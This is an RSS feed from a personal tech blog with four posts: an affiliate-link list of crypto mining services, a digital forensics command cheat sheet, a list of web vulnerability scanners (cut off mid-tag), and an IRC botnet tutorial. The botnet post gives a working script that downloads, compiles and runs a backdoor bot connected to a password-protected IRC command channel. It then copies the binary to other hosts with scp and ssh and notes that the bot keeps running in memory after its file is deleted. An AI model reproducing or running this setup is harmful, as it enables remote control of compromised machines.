<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[DigWalker]]></title><description><![CDATA[No problems no future]]></description><link>https://digwalker.com/</link><image><url>https://digwalker.com/favicon.png</url><title>DigWalker</title><link>https://digwalker.com/</link></image><generator>Ghost 3.15</generator><lastBuildDate>Fri, 10 Apr 2026 21:24:53 GMT</lastBuildDate><atom:link href="https://digwalker.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[6 Best Crypto Side Hustle In 2021]]></title><description><![CDATA[<p>When the bitcoin rise to all time high this year it generate once again an opportunity for every one with a decent computer  to earn a lite bit with minimum investment.</p><p> Bitcoin Mining software's are specialized tools which uses your computing power in order to mine cryptocurrency. In exchange of</p>]]></description><link>https://digwalker.com/best-crypto-side-hustel/</link><guid isPermaLink="false">6079cd3644df7403d7e8ec48</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Fri, 16 Apr 2021 18:22:53 GMT</pubDate><media:content url="https://digwalker.com/content/images/2021/04/Untitled---Paint.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2021/04/Untitled---Paint.jpg" alt="6 Best Crypto Side Hustle In 2021"><p>When the bitcoin rise to all time high this year it generate once again an opportunity for every one with a decent computer  to earn a lite bit with minimum investment.</p><p> Bitcoin Mining software's are specialized tools which uses your computing power in order to mine cryptocurrency. In exchange of mining operation, you can receive a monetary reward in the form of digital currency. These applications provide a detailed report based on your earnings. Many such tools are automated, and hence there is no need for technical skills.</p><p>Following is a handpicked list of Top Bitcoin Mining Software, with their popular features and website links. The list contains both open source (free) and commercial (paid) software.</p><h3 id="1-kryptex">1) <a href="https://www.kryptex.org/?ref=a26caf3d">Kryptex</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2021/04/kryptex.png" class="kg-image" alt="6 Best Crypto Side Hustle In 2021"></figure><p><a href="https://www.kryptex.org/?ref=a26caf3d">Kryptex</a> is an application that helps you to mine cryptocurrency and allows you to pay dollars or bitcoins. This application also works when your PC is idle.</p><p><strong>Features: </strong></p><ul><li>You can setup this software with ease.</li><li>This cryptocurrency mining software provides a clean GUI.</li><li>It automatically starts when you turn on the PC.</li><li>Mine with your CPU and GPU.</li><li>It is available in English, Spanish, Portuguese and more.</li></ul><h3 id="2-bemine">2) <a href="https://bemine.club/?ref=ZmFyYWVjaGlsaWJydUBnbWFpbC5jb20%3D">BeMine</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2021/04/bemine-1-.png" class="kg-image" alt="6 Best Crypto Side Hustle In 2021"></figure><p>Established in early 2018, <a href="https://bemine.club/?ref=ZmFyYWVjaGlsaWJydUBnbWFpbC5jb20%3D">BeMine</a> provides its services in Russia and CIS countries. They were pioneers of cloudsharing of ASIC-miners. BeMine operates more than ~70,000Th/s placed in Irkutsk, Moscow, and Chelyabinsk region, in Siberia, even in Almaty, Kazakhstan and they keep scaling. BeMine unites Russian data-centers, as well as miners and individuals who want to participate in cryptocurrency around the world.</p><p><strong>Features:</strong></p><ul><li>Users can purchase and store mining equipment, without the need for personal presence during the purchase, transportation, installation, configuration, and maintenance of ASIC.</li><li>Miners are invited to store their equipment in partnered data-centers</li><li>If you don’t want to purchase the whole ASIC-miner, you can also try shares. BeMine can sell up to 1/100 share of exact ASIC for a reasonable price, which may become a very useful way to start a coin mining experience without the necessity of purchasing a whole expensive machine itself.</li><li>You can avail door-to-door delivery of ASIC.</li><li>Fare cloud contracts with deposit extraction.</li></ul><h3 id="3-ecos">3) <a href="https://mining.ecos.am/en/registration?ref=TsLM9gAN">ECOS</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2021/04/ecos-logo-1-.jpg" class="kg-image" alt="6 Best Crypto Side Hustle In 2021"></figure><p><a href="https://mining.ecos.am/en/registration?ref=TsLM9gAN">ECOS</a> is one of the best cloud mining providers out in the industry. It was established in 2017 in the Free Economic Zone along with an agreement signed between the Government of Armenia and the company. It is the first cloud mining provider that is operating with legal status. ECOS has more than 50 000 users of all over the world</p><p><strong>Features:</strong></p><ul><li>The minimum price for a mining contract is $49</li><li>Convenient calculator on the website for choosing a mining contract</li><li>Daily payments</li><li>Withdrawals from 0.001 BTC</li><li>Weekly promotions and auctions for registered users</li><li>Get a free mining contract for 1 month after registration</li></ul><h3 id="4-computta">4) <a href="https://computta.com/?ref=702710">Computta</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2021/04/092620_1027_20BESTBitco1-1-.png" class="kg-image" alt="6 Best Crypto Side Hustle In 2021"></figure><p><a href="https://computta.com/?ref=702710">Computta</a> is a software and services create by cryptography professionals to enable you to make digital money. It offers a simple and intuitive interface.</p><p><strong>Features:</strong></p><ul><li>Setup with just a couple of mouse clicks.</li><li>Compatible with all computer systems.</li><li>It is an automated tool, hence there is no need for technical skills.</li><li>Provides a detailed report based on your earnings.</li><li>It is a free bitcoin miner software.</li><li>You can customize the way you like.</li></ul><h3 id="5-cudo-miner">5) <a href="https://www.cudominer.com/?a=Wy5fswbVX">Cudo Miner</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2021/04/092620_1027_20BESTBitco14-1-.png" class="kg-image" alt="6 Best Crypto Side Hustle In 2021"></figure><p><a href="https://www.cudominer.com/?a=Wy5fswbVX">Cudeo Miner</a> cryptocurrency miner enables you to earn as much money as possible from your PC or laptop. It is easy to install, secure to use, and safe on your hardware.</p><p><strong>Features:</strong></p><ul><li>It offers auto coin switching to maximize profit.</li><li>Provides setting and control to adjust GPU speed and performing optimization.</li><li>Supports CPU, GPU, and ASIC mining.</li><li>It has an advanced hashing algorithm that allows for more customized mining.</li><li>Security through multi-factor authentication.</li><li>You can view your stats, earnings, manage users withdraw funds, and more with ease.</li><li>You can access it from the command line interface.</li></ul><h3 id="6-hashing24">6) <a href="https://hashing24.com/?rid=53616c7465645f5fa6a3050cb1e6404c155c28f8167c2180">Hashing24 </a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2021/04/092620_1027_20BESTBitco15-1-.png" class="kg-image" alt="6 Best Crypto Side Hustle In 2021"></figure><p><a href="https://hashing24.com/?rid=53616c7465645f5fa6a3050cb1e6404c155c28f8167c2180">Hashing24</a> is a software that enables you to mine cryptocurrency without buying any equipment. The tool provides access to real-world data centers. It can automatically deposit your earned mined coins to the balance.</p><p><strong>Features:</strong></p><ul><li>You can mine cryptocurrency without any hassle.</li><li>It has data centers in many countries, including Norway, Canada, Georgia, and Iceland.</li><li>The newest ASIC chips.</li><li>Offers intuitive interface.</li><li>It uses the latest air and cooling technology.</li></ul><p>Now that people know how to make a passive income in crypto, the traditional financial sector needs to keep up, or else it risks becoming redundant. With the increase in crypto regulation over the last few months, the infrastructure is becoming more robust, appealing to once-skeptics and previous neigh-sayers. As the world of crypto continues to expand, we can expect to see more opportunities to put your money to work with the use of DeFi and other blockchain-based services.  </p>]]></content:encoded></item><item><title><![CDATA[Simple IRC BotNet in 3 steps]]></title><description><![CDATA[Simple IRC BotNet]]></description><link>https://digwalker.com/build-a-botnet/</link><guid isPermaLink="false">5ec7f68e3322733553ec0a13</guid><category><![CDATA[Getting Started]]></category><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Sun, 24 May 2020 08:09:11 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/Botne.jpg" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-embed-card"><iframe width="612" height="344" src="https://www.youtube.com/embed/HRGopwDVyRY?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></figure><img src="https://digwalker.com/content/images/2020/05/Botne.jpg" alt="Simple IRC BotNet in 3 steps"><p>It doesn't matter if you are a sysadmin or a hacker, if your budget is low and you are looking for a free way, maybe this tutorial will come in handy .</p><p>In this tutorial I will use <a href="https://freenode.net/">Freenode</a> IRC network, as IRC client <a href="https://www.mirc.com/get.html">MIRC</a>  and a simple <a href="https://raw.githubusercontent.com/qpicss/ircBot/master/MyBot.c">old bot</a> written in C .</p><h3 id="install-mirc">Install <a href="https://www.mirc.com/get.html">MIRC</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/MIRC.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>mIRC is a full featured <strong>Internet Relay Chat</strong> client for Windows that can be used to communicate, share, play or work with others on IRC networks around the world, either in multi-user group conferences or in one-to-one private discussions.</p><p>It has a clean, practical interface that is highly configurable and supports features such as buddy lists, file transfers, multi-server connections, IPv6, SSL encryption, proxy support, UTF-8 display, UPnP, customizable sounds, spoken messages, tray notifications, message logging, and more.</p><p><a href="https://www.mirc.com/install.html">Getting Started with mIRC</a></p><p>Let's open Mirc to create a channel where we will run my operation command center.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/mircF.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Click Continue twice.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/mIRC-Options.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Choose your nickname and click ok. </p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/mIRCsel.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>File -&gt; Select Server.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/freedom.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Select Add.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Edit-Server.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>As a server we will use Freenode server 195.154.200.232 or chat.freenode.net on port 6667</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/mIRCBooton.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Click the Connect button.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-4.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>The favorite window should popup if not on the tab menu click Favorite -&gt;More... .</p><p>Now I will create a new channel - password protected. My channel will be called DigWalker and the password will be test123 .</p><p>To join or create a channel you can run on any window</p><p>/j &lt;MyChannelName&gt;</p><p>or you can join from Favorite window. </p><p>Let's set the password for the new channel.</p><p>Mouse click right on the channel window will show the option Channel Modes</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/ChannelModes-1.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Check the Key option, write the channel password and click ok.</p><p>Now we are ready! Our command and control center is ready and running.</p><h3 id="setup-an-environment">Setup an environment</h3><p>Basic architecture of what I want to accomplish should look like this.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/architecture-2.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>It doesn't mater if bots are dockers or virtual server heck, it will work on some hardware too, like routers and <a href="https://busybox.net/">BusyBox</a>'s. </p><p>Without IRC I will have a bunch of machines working and it will take me more time to configure all of them one by one- for instance if I want to run a "node js install" on all of them.</p><p>First lets start up some servers.</p><p>As "play ground" I choose <a href="https://go.cloudwm.com/visit/?bta=35344&amp;brand=kamatera">Kamatera</a> platform because you can really do things fast there.</p><p>Super fast, easy to use and all plans are transparent, with no hidden costs.</p><p><a href="https://go.cloudwm.com/visit/?bta=35344&amp;brand=kamatera">After login</a></p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/servers.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Select My Cloud-&gt;Servers -&gt; Create New Server</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/zone-1.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Choose server zone. I choose Europe FRANKFURT</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-1.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Choose server image. I selected Ubuntu.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/network.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>The serves will have only Public Network.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Specs.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Choose server specifications</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/serversN4.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Here I will generate 4 servers with same spec's and credentials. </p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/payments.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>I'm choosing hourly billing because the servers will be temporary.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-3.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Click CREATE SERVERS and your servers request will be added to the Tasks Queue.</p><p></p><h3 id="running-the-bots">Running the bots</h3><p>As a bot I choose a little guy written by some one called Konewka.</p><p><a href="https://dl.packetstormsecurity.net/irc/kenny.c">https://dl.packetstormsecurity.net/irc/kenny.c</a></p><p>If the link will not work contact me for a copy.</p><p>The bot was designed to be a backdoor, very simple and will give us the power to run bash commands or disconnect from IRC network.</p><p>For something more robust I think you must implement some other options like password on commands, elevate an user permissions as "channel admin" etc... </p><p>In this tutorial I will use a "root user" so you need to take care of privilege escalation before going forward.</p><p>Login in bot1</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-6.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Let's make a script to download, compile and run the bot.</p><!--kg-card-begin: html--><code>mkdir myBot
cd myBot
vi run.sh
</code><!--kg-card-end: html--><p>Paste the script</p><!--kg-card-begin: html--><code>#/bin/bash

wget https://dl.packetstormsecurity.net/irc/kenny.c
apt install gcc -y
gcc kenny.c
./a.out chat.freenode.net:6667 DigWalker test123
echo "Bye bye bot on!"</code><!--kg-card-end: html--><p>Exit vim ":wq" to save as run.sh.</p><p>As you see I'm installing gcc and this will change depending on your system.</p><p>The bot will run on almost any system. </p><p>Make the script executable</p><!--kg-card-begin: html--><code>chmod +x run.sh</code><!--kg-card-end: html--><p>Run the script</p><!--kg-card-begin: html--><code>./run.sh</code><!--kg-card-end: html--><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/root@bot1run.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>The bot is running.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/mIRCbot.jpg" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>As you see my bot is connected and listening to my inputs.</p><p>Let's copy the bot on the remaining servers.</p><p>We will not compile again because my servers are clones an they don't have different cpu or different OS.</p><!--kg-card-begin: html--><code>scp -P 22 /root/a.out root@"bot2 server IP":/root/bot2.out
scp -P 22 /root/a.out root@"bot3 server IP":/root/bot3.out
scp -P 22 /root/a.out root@"bot4 server IP":/root/bot4.out</code><!--kg-card-end: html--><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-8.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Now let's run the second bot</p><!--kg-card-begin: html--><code>ssh root@63.250.59.18 ./bot2.out chat.freenode.net:6667 DigWalker test123</code><!--kg-card-end: html--><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-9.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>After we run the bot we will see it on the channel</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-10.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Now i will do the same thing for bot3 and bot4 in the end i will get the a private channel accessible only with password, me as administrator and 4 bots.</p><p>At the end we will have something like this</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-11.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Let's run some commands with the bots. </p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-12.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>Because I write "!sys pwd" on the channels all the bots answered but, if i want only one bot to run something I can open a private message window and send the command only to that specific bot.</p><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/image-13.png" class="kg-image" alt="Simple IRC BotNet in 3 steps"></figure><p>As you see the bot will answer on the channel.</p><p>We can send a private message from the channel window to a specific user:</p><p>/msg ZW11hQ10 !sys date</p><p>Now you can delete the botX.out file because the bot will run on memory.</p><p>If you deleted the bot file now you have 3 options to kill the bot:</p><p>1. Restart the bot OS</p><p>2. Send command from IRC "!exit" </p><p>3. Kill the bot process.</p><p>This article should be use only for educational for purpose only!</p><p>If you have any question fill free to drop a message on <a href="https://www.facebook.com/Kali02Sana/">Facebook</a>.</p>]]></content:encoded></item><item><title><![CDATA[Sys Forensics Tools]]></title><description><![CDATA[<p><strong>Digital forensics</strong> (sometimes known as <strong>digital forensic science</strong>) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation</p>]]></description><link>https://digwalker.com/memory-forensics-cheat-sheet/</link><guid isPermaLink="false">5ec65c363322733553ec0924</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Thu, 21 May 2020 15:29:27 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/Forensics-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/Forensics-1.jpg" alt="Sys Forensics Tools"><p><strong>Digital forensics</strong> (sometimes known as <strong>digital forensic science</strong>) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data. With roots in the personal computing revolution of the late 1970s and early 1980s, the discipline evolved in a haphazard manner during the 1990s, and it was not until the early 21st century that national policies emerged.</p><p>Any digital forensics practitioner will have a wide variety of tools in their kit. At one end of the spectrum you have single-purpose open source tools like the packet sniffer Wireshark or HashKeeper, a free-to-use program that can speed the examination of database files. At the other end, you have powerful commercial software platforms with multiple functions and slick reporting capabilities like Encase, or CAINE, an entire Linux distribution dedicated to forensics work.</p><p>Today I will present you some powerful free tools you can play with</p><ul><li>Hex File Headers</li><li> grep/egrep</li><li> sort</li><li> awk</li><li> sed</li><li> uniq</li><li> date</li><li> Windows findstr</li></ul><h3 id="hex-file-header-and-ascii-equivalent">Hex File Header and ASCII Equivalent</h3><p>File headers are used to identify a file by examining the first 4 or 5 bytes of its hexadecimal content.</p><!--kg-card-begin: html--><table><tr>
    <td>Filetype</td>
    <td>Start</td>
    <td>Start ASCII</td>
    <td>Translation</td>
</tr>
  <tr><td>ani</td><td>52 49 46 46</td><td>RIFF</td></tr>
<tr><td>au</td><td>2E 73 6E 64</td><td>snd</td></tr>
<tr><td>bmp</td><td>42 4D F8 A9</td><td>BM</td></tr>
<tr><td>bmp</td><td>42 4D 62 25</td><td>BMp%</td></tr>
<tr><td>bmp</td><td>42 4D 76 03</td><td>BMv</td></tr>
<tr><td>cab</td><td>4D 53 43 46</td><td>MSCF</td></tr>
<tr><td>dll</td><td>4D 5A 90 00</td><td>MZ</td></tr>
<tr><td>Excel</td><td>D0 CF 11 E0</td></tr>
<tr><td>exe</td><td>4D 5A 50 00</td><td>MZP</td><td>(inno)</td></tr>
<tr><td>exe</td><td>4D 5A 90 00</td><td>MZ</td></tr>
<tr><td>flv</td><td>46 4C 56 01</td><td>FLV</td></tr>
<tr><td>gif</td><td>47 49 46 38 39 61</td><td>GIF89a</td></tr>
<tr><td>gif</td><td>47 49 46 38 37 61</td><td>GIF87a</td></tr>
<tr><td>gz</td><td>1F 8B 08 08</td></tr>
<tr><td>ico</td><td>00 00 01 00</td></tr><tr>
</tr><tr><td>jpeg</td><td>FF D8 FF E1</td></tr><tr>
</tr><tr><td>jpeg</td><td>FF D8 FF E0</td><td>JFIF</td></tr><tr>
</tr><tr><td>jpeg</td><td>FF D8 FF FE</td><td>JFIF</td></tr><tr>
</tr><tr><td>Linux</td><td>bin 7F 45 4C 46</td><td>ELF</td></tr><tr>
</tr><tr><td>png</td><td>89 50 4E 47</td><td>PNG</td></tr><tr>
</tr><tr><td>msi</td><td>D0 CF 11 E0</td></tr><tr>
</tr><tr><td>mp3</td><td>49 44 33 2E</td><td>ID3</td></tr><tr>
</tr><tr><td>mp3</td><td>49 44 33 03</td><td>ID3</td></tr><tr>
</tr><tr><td>OFT</td><td>4F 46 54 32</td><td>OFT2</td></tr><tr>
</tr><tr><td>PPT</td><td>D0 CF 11 E0</td></tr><tr>
</tr><tr><td>PDF</td><td>25 50 44 46</td><td>%PDF</td></tr><tr>
</tr><tr><td>rar</td><td>52 61 72 21</td><td>Rar!</td></tr><tr>
</tr><tr><td>sfw</td><td>43 57 53 06/08</td><td>cws</td></tr><tr>
</tr><tr><td>tar</td><td>1F 8B 08 00</td><td>00</td></tr><tr>
</tr><tr><td>tgz</td><td>1F 9D 90 70</td></tr><tr>
</tr><tr><td>Word</td><td>D0 CF 11 E0</td></tr><tr>
</tr><tr><td>wmv</td><td>30 26 B2 75</td></tr><tr>
</tr><tr><td>zip</td><td>50 4B 03 04</td><td>PK</td></tr><tr><!--kg-card-end: html--><h3 id="grep-egrep">grep/egrep</h3><p>grep's strength is extracting information from text files. grep operates on one or multiple files when provided with a command line argument(s) that can also include wildcards:</p><p>Example: grep "John" addressbook  Would return the lines that contained the "John" string in the addressbook text file</p><p>Some useful flags:</p><p>-A Print number of lines after the match -B Print number of lines before match -c Report number of occurrences -f Reads one or more patterns from a file. Pattern are terminated by a newline -h Suppress the file names on the output -i Ignore case -l Report matching files, not matching lines -P Interpret pattern as a Perl Regex -v  Reverse operation: return the lines not matching the string</p><p>The egrep (extended grep) utility can be useful to match several possible strings at the same time (in an OR mode):</p><p>egrep "John|Peter" addressbook  grep "John|Peter" addressbook</p><h3 id="sort-function sort() { [native code] }1">sort</h3><p>sort, as its name implies, will sort the output. There are a few interesting options you can use:</p><p>-d Uses dictionary order. Only letters, digits and blanks. -n  will sort the output assuming it is numerical (instead of string) -u will remove redundant line, 'uniquing' the results</p><h3 id="awk">awk</h3><p>awk is an extremely useful tool, especially for parsing data structured in columns. It is straightforward to use for simple purposes. Its basic use is to select some particular columns from the output: column 1 is referred to as $1, column 2 as $2, etc.</p><p>The space is the default awk separator. However if you want to be able to parse data separated by some other character, e.g. ":", you can use the -F flag.</p><p>Example:  echo "hello:goodbye" | awk -F: '{print $2}'</p><p>Would return "goodbye" as an output</p><h3 id="sed">sed</h3><p>sed is an excellent command for character substitution. Example: if you want to substitute the first occurrence of the 'a' character by an 'e':</p><p>echo "hallo" | sed 's/a/e/'</p><p>The output would be: hello You can use the g modifier to substitute all instances:</p><p>echo "Hallo Janny" | sed 's/a/e/g'</p><p>The output would be: Hello Jenny</p><h3 id="uniq">uniq</h3><p>The uniq command reads the input and compares adjacent lines. If two or more adjacent lines are identical, all but one is removed.</p><p>Here is a list of the most common options used with uniq:</p><p>-c     Prefix line with number of occurrence -f     Avoid comparing the first N fields -i     Ignore case -s     Avoid comparing the first N characters -u     Only print unique lines</p><p>Consider this input file:</p><p>a      </p><p>b      </p><p>c          </p><p>b </p><p>Now run uniq on it: sort testfile | uniq      a      b      c Now run uniq -c on it:                 1   a     </p><p>2   b     </p><p>1   c</p><h3 id="date">date</h3><p>Check the date man page for more options.</p><p>Returns the real date from epoch time: date –d @1284127201</p><p>Return an epoch time of 1288756800: date +%s -d “2010-11-03”</p><p>Return a 2 days old date:  date --date="-2 days"  +"%Y-%m-%d"</p><p>Return 20:00 hours: date -d @1288310401 +%k:%M</p><h3 id="windows-findstr">Windows findstr</h3><p>The Windows findstr has one interesting feature that differs from grep. If you need to search for multiple strings, you need to separate them with a space.</p><p>For example, you want or need to look for a match for WHITE or GREEN in a text file, you write your command like this:</p><p>findstr "WHITE GREEN" textfile</p><p>To make the search case insensitive, add the /I to print all variant of WHITE or GREEN.</p><p>Windows findstr Command List</p><p>/B Matches pattern if at the beginning of  a line. </p><p>/E Matches pattern if at the end of a line. </p><p>/L Uses search strings literally. </p><p>/R Uses search strings as regular expressions. </p><p>/S Searches for matching files in the current directory and all subdirectories. </p><p>/I Specifies that the search is not to be case-sensitive. </p><p>/X Prints lines that match exactly. </p><p>/V Prints only lines that do not contain a match. </p><p>/N Prints the line number before each line that matches. </p><p>/M Prints only the filename if a file contains a match. </p><p>/O Prints character offset before each matching line. </p><p>/P Skip files with non-printable characters.</p></tr></table>]]></content:encoded></item><item><title><![CDATA[OpenSource and comunity version Security scan tools 2020]]></title><description><![CDATA[<p>Web Application Vulnerability Scanners are automated tools that scan web applications, normally from the outside, to look for security vulnerabilities such as Cross-site scripting, SQL Injection, Command Injection, Path Traversal and insecure server configuration. This category of tools is frequently referred to as Dynamic Application Security Testing (DAST) Tools. A</p>]]></description><link>https://digwalker.com/opensource-and-comunity-version-security-scan-tools-2020/</link><guid isPermaLink="false">5ec621313322733553ec085b</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Thu, 21 May 2020 09:14:58 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/sec-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/sec-1.jpg" alt="OpenSource and comunity version Security scan tools 2020"><p>Web Application Vulnerability Scanners are automated tools that scan web applications, normally from the outside, to look for security vulnerabilities such as Cross-site scripting, SQL Injection, Command Injection, Path Traversal and insecure server configuration. This category of tools is frequently referred to as Dynamic Application Security Testing (DAST) Tools. A large number of both commercial and open source tools of this type are available and all of these tools have their own strengths and weaknesses. If you are interested in the effectiveness of DAST tools, check out the OWASP Benchmark project, which is scientifically measuring the effectiveness of all types of vulnerability detection tools, including DAST.</p><figure class="kg-card kg-image-card"><img src="https://static.shareasale.com/image/37723/728x90-copy2-free-easy-powerful_02.gif" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure><h3 id="w3af"><a href="http://w3af.org/">W3AF</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/w3af.jpg" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure><p>w3af is an open source web application used for security scanning. It is also called web application attack or audit framework. This application provides vulnerabilities scanner and exploiting tools for web applications. This project play an important role in penetration testing engagement because it’s provide information about security vulnerabilities.</p><p>Fast HTTP Client</p><ul><li>Proxy support</li><li>HTTP Basic and Digest authentication</li><li>UserAgent faking</li><li>Add custom headers to requests</li><li>Cookie handling</li><li>HTTP response cache</li><li>DNS cache</li><li>File upload using multipart</li></ul><p>Fuzzing</p><ul><li>Query string</li><li>POST-data</li><li>Headers</li><li>Cookie values</li><li>Multipart/form file content</li><li>URL filename</li><li>URL path</li></ul><h3 id="nikto"><a href="https://cirt.net/Nikto2">Nikto</a></h3><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Nikto2-.jpg" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure><p>Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.</p><p>Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker’s anti-IDS methods in case you want to give it a try (or test your IDS system).</p><p>Not every check is a security problem, though most are. There are some items that are “info only” type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.</p><p>Features</p><ul><li>SSL Support (Unix with OpenSSL or maybe Windows with ActiveState’s Perl/NetSSL)</li><li>Full HTTP proxy support</li><li>Checks for outdated server components</li><li>Save reports in plain text, XML, HTML, NBE or CSV</li><li>Template engine to easily customize reports</li><li>Scan multiple ports on a server, or multiple servers via input file (including nmap output)</li><li>LibWhisker’s IDS encoding techniques</li><li>Easily updated via command line</li><li>Identifies installed software via headers, favicons and files</li><li>Host authentication with Basic and NTLM</li><li>Subdomain guessing</li><li>Apache and cgiwrap username enumeration</li><li>Mutation techniques to “fish” for content on web servers</li><li>Scan tuning to include or exclude entire classes of vulnerability checks</li><li>Guess credentials for authorization realms (including many default id/pw combos)</li><li>Authorization guessing handles any directory, not just the root directory</li><li>Enhanced false positive reduction via multiple methods: headers,</li><li>page content, and content hashing</li><li>Reports “unusual” headers seen</li><li>Interactive status, pause and changes to verbosity settings</li><li>Save full request/response for positive tests</li><li>Replay saved positive requests</li><li>Maximum execution time per target</li><li>Auto-pause at a specified time</li><li>Checks for common “parking” sites</li><li>Logging to Metasploit</li><li>Thorough documentation</li></ul><figure class="kg-card kg-image-card"><img src="https://static.shareasale.com/image/37723/eCommerce-shipping-english-728x90.png" class="kg-image" alt="OpenSource and comunity version Security scan tools 2020"></figure><h3 id="burp-suite"><a href="https://portswigger.net/burp/communitydownload">Burp Suite</a></h3><figure class="kg-card kg-image-card"><img 